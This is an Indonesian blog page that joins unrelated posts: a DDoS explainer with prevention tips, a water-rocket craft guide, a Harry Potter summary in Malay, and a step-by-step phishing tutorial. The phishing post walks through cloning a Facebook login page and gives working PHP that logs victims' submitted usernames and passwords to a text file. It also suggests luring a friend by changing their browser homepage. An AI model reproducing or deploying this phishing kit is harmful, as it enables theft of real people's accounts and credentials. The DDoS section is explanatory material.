Rabu, 10 April 2019

apa itu yang di namakan DDOS

Pengertian DDOS dan Bagaimana Menanggulanginya

  4 min read
Pengertian DDOS dan cara kerja DDOS adalah
Apa itu DDoS? DDoS merupakan kependekan dari Distributed Denial of Service atau dalam bahasa Indonesia dapat diartikan sebagai Penolakan Layanan secara Terdistribusi. DDoS adalah jenis serangan yang dilakukan dengan cara membanjiri lalu lintas jaringan internet pada server, sistem, atau jaringan. Umumnya serangan ini dilakukan menggunakan beberapa komputer host penyerang sampai dengan komputer target tidak bisa diakses.
DDoS adalah serangan yang sangat populer digunakan oleh hacker. Selain mempunyai banyak jenis, DDoS memiliki konsep yang sangat sederhana, yaitu membuat lalu lintas server berjalan dengan beban yang berat sampai tidak bisa lagi menampung koneksi dari user lain (overload). Salah satu cara dengan mengirimkan request ke server secara terus menerus dengan transaksi data yang besar.
Berhasil atau tidaknya teknik DDoS dipengaruhi oleh kemampuan server menampung seluruh request yang diterima dan juga kinerja firewall saat ada request yang mencurigakan. Infographics]

Serangan DDoS Terbesar

Percobaan serangan DDoS setiap tahun selalu meningkat. Penggunanya tidak hanya user yang ingin mencari sensasi, bahkan digunakan dengan alasan politik, atau tindak kejahatan yang ingin mengganggu stabilitas server dan bahkan mencuri data yang ada di dalamnya.
Serangan ke Spamhaus pada tahun 2013 tercatat sebagai serangan DDoS terbesar sepanjang sejarah. Serangan ini mencapai puncak tertinggi 400 Gbps dan mengakibatkan Github tidak bisa diakses beberapa menit. Di tahun berikutnya terjadi serangan ke salah satu klien Cloudflare dengan kekuatan 33% lebih besar dibandingkan serangan yang dilakukan ke Spamhaus.
Selain Spamhaus dan Cloudflare, Serangan ke BBC tahun 2015 juga tercatat sebagai serangan DDoS terbesar sepanjang sejarah. Serangan ini mengakibatkan hampir semua layanan BBC lumpuh. Keseluruhan domain tidak bisa diakses, bahkan layanan On-Demand dan radio juga mati.
Github juga menjadi korban serangan serangan DDoS. Pada tahun 2015 bukan menjadi serangan terbesar yang ditujukan ke situs itu. Ternyata, pada tahun 2018 terjadi serangan yang sama dan hampir 3 kali lebih besar dibanding serangan yang terjadi sebelumnya.
Github mendapatkan serangan DDoS yang mencapai puncak tertinggi transaksi data yang sangat fantastis, yaitu 1.35 Tbps. Serangan tersebut berasal dari ribuan Autonomous System (ASN) di puluhan ribu titik akhir yang unik. Cara kerja serangan DDoS adalah melalui penyalahgunaan instance memcached yang memang dapat di akses melalui internet dengan UDP secara publik.
Serangan ke Github awal tahun ini menggunakan DDoS adalah serangan DDOS terbesar sepanjang sejarah yang tercatat saat ini.

Cara Kerja dan Tujuan DDoS

Konsep sederhana DDoS attack adalah membanjiri lalu lintas jaringan dengan banyak data. Konsep Denial of Service bisa dibagi menjadi 3  tipe penggunaan, yakni sebagai berikut :
  • Request flooding merupakan teknik yang digunakan dengan membanjiri jaringan  menggunakan banyak request. Akibatnya, pengguna lain yang terdaftar tidak dapat dilayani.
  • Traffic flooding merupaka teknik yang digunakan dengan membanjiri lalu lintas jaringan dengan banyak data. Akibatnya, pengguna lain tidak bisa dilayani.
  • Mengubah sistem konfigurasi atau bahkan merusak komponen dan server juga termasuk tipe denial of service, tetapi cara ini tidak banyak digunakan karena cukup sulit untuk dilakukan.
Sedangkan jika kategorikan berdasarkan layer OSI, ada serangan pada layer aplikasi, protokol, dan volumetrik.
  • DDoS Layer Aplikasi
ddos adalah
Kategori penyerangan ini adalah mengambil semua sumber daya dari target. Target dari serangan adalah later dimana halaman website dieksekusi pada server dan mengirimkan respon ke  HTTP request. Sangat ringan jika hanya melayani satu request. Sedangkan akan menjadi masalah jika melayani banyak request secara bersamaan apalagi jika menjalankan query database juga.
  • DDoS Protokol
syn flood ddos adalah attack
Serangan ini mengekploitasi TCP dengan cara mengirimkan paket SYN dengan spoof alamat IP dalam jumlah yang besar. Setiap koneksi yang masuk akan ditanggapi oleh server yang menunggu proses koneksi berjalan, namun tidak pernah terjadi. Hal ini akan mengakibatkan proses yang terus berjalan pada server yang dapat menyebabkan overload.
  • Volumetrik DDoS
Image:
ntp-amplification-botnet-ddos adalah
Tujuan dari serangan DDoS ini adalah menghabiskan semua bandwidth yang tersedia antara target dengan jaringan internet. Caranya adalah dengan membuat lalu lintas yang sangat padat, seperti penggunaan botnet.
Tidak semua jenis yang dapat kami bahas, masih ada banyak tipe serangan DDoS yang tercatat selama ini, seperti serangan Memcached DDoS, NTP Apmlification, DNS Flood, UDP Flood, dan masih banyak lainya.
Serangan Denial of Service (DoS) pertama kali muncul lpada tahun 1996 yang dikenal dengan serangan SYN Flooding Attach untuk mengeksploitasi kelemahan protokol Transmission Control Protocol (TCP). Sejarahnya DDoSadalah versi awal dari DDoS.

Teknik DDoS

Serangan DDoS adalah teknik penyerangan yang mempunyai banyak cara sederhana, seperti menggunakan virus, botnet, dan perangkat lunak yaitu RailGun.
  • Botnet
Pada pengembangannya, serangan DDoS dilakukan dengan bantuan kumpulan bot yang dijalankan secarabersama-sama. Bot disisipkan pada malware yang kemudian di tanam ke komputer yang terhubung ke jaringan internet.
Jumlah komputer ini bisa puluhan sampai dengan jutaan, tergantung banyaknya komputer yang telah terinfeksi malware. Semua komputer ini dinamakan dengan botnet, sedangkan satu komputer yang terinfeksi dinamakan dengan komputer zombie.
Hanya menggunakan satu perintah saja, botnet langsung menjalankan perintah untuk melakukan DDoS ke komputer target dalam waktu bersamaan.
  • Virus
Di internet, seseorang yang berencana melakukan DDoS adalah dengan menyebarkan virus melalui file yang dibagikan ke berbagai situs yang terhubung dengan internet. Virus sengaja diciptakan salah satunya adalah untuk menjalankan bot melalui script yang berjalan pada sistem operasi. Bahkan beberapa virus dapat mengambil hak akses dari perangkat yang sudah mengunduh script dan dijalankan pada sistem operasi.
Saat komputer sudah terinfeksi virus DDoS, sebuah virus akan secara aktif melakukan serangan DDoS ke server atau ke alamat IP tertentu yang sudah ditentukan.

Ciri Website Anda Terkena DDoS

  • Bandwidth mengalami lalu lintas yang sangat padat secara drastis baik download atau upload. Terjadi tiba – tiba dan berlangsung secara terus menerus. Jika target adalah VPS, bisa jadi konsumsi bandwidth akan mencapai batas penggunaan sehingga VPS tidak bisa diakses.
  • Load CPU menjadi sangat tinggi padahal tidak ada proses yang dieksekusi yang mengakibatkan kinerja menjadi menurun sampai dengan website tidak bisa diakses.
  • Jika sistem Anda berada pada penyedia layanan VPS, terkadang ada yang menyediakan layanan informasi jika sewaktu-waktu terjadi aktivitas mencurigakan pada server. Anda juga bisa mengaturnya sendiri.
Ada berbagai cara yang bisa Anda lakukan untuk mencegah serangan DDoS yang membuat sistem berhenti bekerja.
  • Memperbarui sistem operasi ke versi terbaru. Hal ini bertujuan untuk mengatasi menutupi bagian-bagian rentan yang bisa saja dijadikan pintu masuk akses ilegal.
  • Membatasi akses dari dan ke sistem sehingga bisa menyaring trafik data yang masuk dan keluar pada komputer atau server yang Anda gunakan.
  • Jika serangan yang terjadi menggunakan Smurf, Anda dapat mencoba mengatasinya dengan cara mematikan sementara broadcast address pada router. Bisa juga dengan melakukan penyaringan atau membatasi permintaan ICMP pada firewall.
  • Menggunakan perangkat lunak keamanan tambahan untuk sistem.

Cara Mengatasi DDoS

Ada beberapa cara yang bisa Anda lakukan jika website atau sistem terkena DDoS. Berikut ini beberapa yang bisa Anda coba:
  • Melakukan Identifikasi Serangan, biasanya jika Anda mempunyai server sendiri, tanda-tanda jika sedang terjadi serangan DDoS akan terlihat. Jika dikethui maka Anda bisa bersiap-siap melakukan penanganan sebelum terjadi serangan DDoS yang lebih serius.
  • Mempertahankan Parameter Network, ada beberapa langkah teknis yang dapat diambil untuk mengurangi sebagian efek dari serangan, dan beberapa diantaranya cukup sederhana. Misalnya anda dapat:
  • Memperbesar Bandwidth, jika masih bisa melakukan pelebaran bandwidth, cara ini bisa dicoba untuk memberikan waktu agar sistem tidak sampai down. Jika serangan DDoS terlalu besar maka cara ini mungkin tidak akan berpengaruh banyak untuk penanganan.
  • Menghubungi ISP atau Hosting Provider, salah satu ciri serangan DDoS adalah menyerang alamat ip dari sistem, sehingga Anda bisa melaporkan kejadian tersebut kepada penyedia jasa internet yang dipakai dan mendeteksi serangan yang terjadi.
  • Menghubungi Spesialis DDoS, langkah terakhir yang bisa diambil adalah dengan menghubungi layanan spesialis DDoS yang bisa mencoba membantu Anda untuk menangani serangan yang terjadi.

Kesimpulan

DDoS adalah teknik penyerangan pada sistem yang sangat populer digunakan. Selain sederhana, dengan modifikasi strategi, DDoS bisa menjadi teknik yang sangat ampuh untuk meenggantu sistem.
Ada beberapara cara melakukan DDoS seperti menggunakan request flooding dan traffic flooding. Kedua cara ini mempunyai kesamaan yaitu membanjiri lalu lintas jaringan dengan banyak data atau request. Jika berhasil maka pengguna lain akan kesulitan untuk melakukan akses ke sistem dan bisa jadi mengakibatkan sistem rusak dan tidak bisa diakses.
Tetapi ada beberapa cara yang bisa dilakukan untuk mencegah sistem bermasalah saat diserang oleh DDoS. Memperbarui sistem operasi ke versi terbaru adalah cara mencegah DDoS menyerang melalui celah yang ada pada sistem operasi. Selain itu melakukan konfigurasi pada firewall sehingga bisa memblokir akses yang mencurigakan yang bisa terjadi akibat percobaan DDoS.
untuk lebik lengkapnya silahkan klik link

cara pissing akun

Hack Semua Akun? Emang bisa? Memang terlihat mustahil namun didunia ini tidak ada yang tidak mungkin selama kita mau berusaha dan berdo’a tentunya, hehe.. Okeh, kali ini saya ingin mau bahas tentang cara hack semua akun, entah itu akun facebook, twitter, gmail, yahoo atau apapun selama akun tersebut memiliki halaman login kita bisa hack. Pasti udah gak sabaar yah, hehe.. Okeh saya jelasin dulu sedikit tentang teknik ini yah, Phising merupakan teknik hacking dengan melakukan pencurian informasi milik korban dengan cara memanfaatkan kelengahan user/korban melalui halaman phising yang telah kita buat.
Fungsi dari halaman phising ini adalah mengalihkan perhatian korban sehingga korban nantinya mau login melalui halaman phising yang telah kita buat. Okeh untuk contoh kali ini saya menggunakan halaman facebook, tapi intinya sama untuk semua jenis akun ko ðŸ™‚
Okeh langsung kita mulai aja deh tutorialnya..
1. Buka http://www.facebook.com (Jika anda ingin hack twitter tinggal masuk halaman login twitter begitu juga yahoo, intinya kita mendapatkan halaman login dari akun yang akan kita buat halaman phisingnya ðŸ˜€ )
2. Klik Kanan >> View Page Source atau tekan CTRL + U
3. Copy semua kode yang ada disitu kemudian paste ke notepad
4. Tekan CTRL + F kemudian cari kata action=
5..Ubah.action=”https://www.facebook.com/login.php?login_attempt=1” menjadi action=”facebook.php” .. Ubah juga method dari POST menjadi get
6. Simpan notepad ini dengan nama index.php
7. Buat notepad baru kemudian isikan kode berikut
<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan
8. Simpan Dengan Nama facebook.php
9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt
10. Kemudian Upload ke tiga file tersebut ke http://ripway.com atau ke alamat free hosting lainnya
11. Ubah permission pada file pass.txt menjadi 777 agar password dari akun korban dapat terbaca oleh system
Okeh selesai membuat halaman phising dari facebook/halaman akun korban tinggal kita pancing aja deh biar korban dapat masuk perangkap phising kita, hehe.. Okeh saya kasih tau cara paling gampangya deh, jika korban merupakan teman anda maka anda bisa menjebak korban dengan cara merubah homepage browser milik korban dengan halaman phising kita deh. Setelah itu ya tinggal tunggu aja deh korban kita terperangkap, hehe.. Selamat mencoba ðŸ™‚
sumber klik link berikut link

CARA MEMBUAT ROKET AIR



Panduan Membuat Roket Air Sederhana

Assalamu’alaikum
Halo semuanya, dikesempatan kali ini saya ingin berbagi tutorial kepada anda – anda semua tentang cara membuat roket air.

Kebetulan, saya dan teman – teman sekelas saya, tengah mendapat tugas dari dosen pembimbing kami untuk membuatnya. Jadi tak ada salahnya jika saya bagikan panduannya kepada kalian yang mungkin membutuhkan.
Roket air yang kita buat sendiri terbuat dari bahan yang sangat sederhana sekali, yaitu :
Foto1617

1. 2 buah botol plastik ukuran 1 Liter atau 1,5 Liter (Pastikan Ukurannya Sama)

Foto1593

2. Plastisin Secukupnya

Foto1600

3. Lem G

4. Kapas

5. 2 buah map plastik

Foto1606

6. Lakban

Foto1611

7. Coupling PH 20

Foto1630

8. Selang Kecil dengan panjang 2 cm

Foto1596

Adapun alat yang dibutuhkannya :
  1. Gunting
  2. Soldier
  3. Cutter
Untuk proses pembuatannya menurutku, tidak begitu sulit apalagi bagi kalian yang suka dengan yang namanya kegitan – kegiatan praktek. Adapaun proses pembuatannya adalah sebagai berikut :
  • Lubangi bagian tengah dari kaki botol plastik menggunakan soldier. Kemudain rapihkan menggunakan cutter (Lakuakan juga pada botol kedua)Foto1595
  • Masukan selang kecil kedalam lubang-lubang botol, sehingga kaki – kaki botol saling bertempelan/bertemu. Usahakan selang tepat masuk di bagian kedua lubang, jangan sampai ada kebocoran/celah.
    Foto1597Foto1598










  • Agar kedua botol tertempel kuat, masukan kapas ke dalam sela – sela kedua kaki botol kemudian lumasi dengan lem G.
  • Pada salah satu kepala botol, tempelkan plastisin sehingga tampak seperti pada gambar.
Foto1607
  • Untuk membuat kepala roket, silahkan buat kerucut yang terbuat dari map plastik. Gunting map plastik tersebut sehingga terbentuk sebuah kerucut yang diameternya sama dengan bagian bodi botol. Kemudian pasangkan dan tutupi bagian kepala yang terdapat plastisinnya menggunakan lakban.
  • Untuk membuat sirip roket, caranya sama seperti bagian no. 5 yaitu menggunakan map plastik. SIlahkan buat 3 buah sirip dan tempelkan disekeliling dari bagian bawah roket menggunakan lakban. (Usahakan tiap sirip dari roket  tersebut tebal, salah satu caranya yaitu dengan melipatnya)
  • Untuk membuat roket nampak lebih rapih dan lebih kuat. Kalian bisa membalut sekaligus menutupi bagain sela – sela botol menggunakan map plastik dan keratkan menggunakan lakban.
  • Bagian terakhir yaitu membuat jalan masuknya air ke dalam botol. Caranya yaitu dengan melubangi bagian tutup botol pada bagian bawah roket dengan soldier, setelah itu masukan coupling kedalam lubang tersebut.
Nah begitulah cara membuat roket air nya, bagi kalian yang berminat silahkan ikuti aja instruksi di atas. Dan untuk penanya silahkan tinggalkan komentar dibawah.
Semoga Bermanfaat !                 
   

HARRY POTTER AND THE PRISONER OFF AZKABAN

Berkas:Prisoner of Azkaban cover.jpg
HARRY POTTER AND THE PRISONER OFF AZKABAN

Harry Potter menghabiskan musim panas bersama-sama pasangan Dursley sebelum memulakan tahun ketiga di Hogwarts. Kerana terlalu marah, dia mengembangkan Bibi Marge dan meninggalkan rumah, lalu bertembung dengan Menteri Sihir. Dia dilepaskan pergi tanpa apa-apa hukuman, sebab utamanya (yang Harry dapat tahu kemudian) adalah seorang pembunuh bersiri, Sirius Black berjaya melarikan diri dari penjara sihir, Azkaban untuk membunuh Harry. Black ialah penyokong Voldemort dan telah merengok di dalam penjara selama 12 tahun. Tahun ini, para pengawal Azkaban, yang dikenali sebagai Dementors mengawal Hogwarts. Harry dan rakan-rakannya kembali ke Hogwarts dan setiap kali bersemuka dengan Dementors, Harry tidak sedap hati kerana mereka memaksa manusia mengimbau kembali pengalaman terpahit mereka dan melenyapkan kebahagiaan dari jiwa masing-masing. Sekolah itu mendapat cikgu ‘Pertahanan Diri Daripada Ilmu Hitam’ yang baru, Profesor Remus Lupin yang merupakan cikgu yang hebat. Hagrid juga mula mengajar mata pelajaran ‘Penjagaan Makhluk-Makhluk Sihir’. Pembelajaran mereka bermula seperti biasa dan Harry mengambil beberapa mata pelajaran baru termasuk ‘Ilmu Tilik’, yang mana sepanjang tahun, Profesor Trelawney kerap meramalkan kematian Harry.